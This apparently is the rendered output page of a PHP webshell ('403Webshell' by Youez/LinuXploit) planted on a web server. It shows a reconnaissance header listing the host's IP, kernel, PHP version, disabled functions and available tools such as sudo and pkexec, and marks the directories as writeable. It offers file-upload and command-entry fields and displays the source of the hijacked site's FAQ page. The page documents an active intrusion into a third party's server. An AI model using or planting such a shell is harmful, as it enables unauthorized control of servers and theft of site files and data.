403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/innoutstorage2019/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/innoutstorage2019/en/faq.php
<?php
	require_once ('../webadmin/basic_info.php');

	$faq_info = get_faq();
?>

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
	<?php require_once ("html_head.php") ?>

</head>

<body class="stretched no-transition">

<?php require_once ("google_analysis.php"); ?>

<!-- Document Wrapper
============================================= -->
<div id="wrapper" class="clearfix">

	<!-- Header
	============================================= -->
	<?php require_once ("html_header.php") ?>

	<!-- Content
	============================================= -->
	<section id="content">

		<div class="content-wrap">

			<div class="container clearfix">

				<div class="heading-block center">
					<h1>FAQ</h1>
					<span>These are some frequently asked questions from our customers. If you have further questions, please contact us on +852 2580 2088</span>
				</div>

				<div id="faqs" class="faqs">

					<?php
						foreach($faq_info as $faq){
							if($faq["status"] == 0)
								continue;

							echo '<div class="toggle faq">
						<div class="togglet"><i class="toggle-closed icon-quote-left"></i><i class="toggle-open icon-quote-left"></i>'.nl2br($faq["question_".$langcode]).'</div>
						<div class="togglec">'.nl2br($faq["answer_".$langcode]).'</div>
					</div>';
						}
					?>


				</div>

			</div>

		</div>

	</section><!-- #content end -->

	<!-- Footer
	============================================= -->
	<?php require_once ("html_footer.php") ?>

</div><!-- #wrapper end -->

<!-- Go To Top
============================================= -->
<div id="gotoTop" class="icon-angle-up"></div>

<!-- Footer Scripts
============================================= -->
<script type="text/javascript" src="../js/functions.js"></script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit